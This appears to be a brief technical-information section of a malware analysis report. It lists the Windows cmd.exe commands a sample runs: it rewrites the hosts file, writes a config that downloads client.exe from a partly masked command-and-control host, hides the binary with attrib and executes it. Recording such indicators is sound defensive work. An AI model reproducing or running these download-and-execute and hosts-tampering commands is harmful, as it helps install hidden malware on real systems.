Техническая информация
- C:\cfg.bin
- '<SYSTEM32>\cmd.exe' /c echo 10.0.0.1 foocnc.com > <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c echo ^>System echo 10.0.0.1 foocnc.com ^> <DRIVERS>\etc\hosts > c:\cfg.bin
- '<SYSTEM32>\cmd.exe' /c echo ^>DownloadURL http://fo##nc.com/mcc/task.php?me###### <SYSTEM32>\cfg.bin >> c:\cfg.bin
- '<SYSTEM32>\cmd.exe' /c echo ^>DownloadURL http://fo##nc.com/mcc/client.exe <SYSTEM32>\agent.exe >> c:\cfg.bin
- '<SYSTEM32>\cmd.exe' /c echo ^>System attrib.exe <SYSTEM32>\agent.exe +h +s +r >> c:\cfg.bin
- '<SYSTEM32>\cmd.exe' /c echo ^>System <SYSTEM32>\agent.exe <SYSTEM32>\cfg.bin >> c:\cfg.bin
- '<SYSTEM32>\cmd.exe' /c echo ^>Exit >> c:\cfg.bin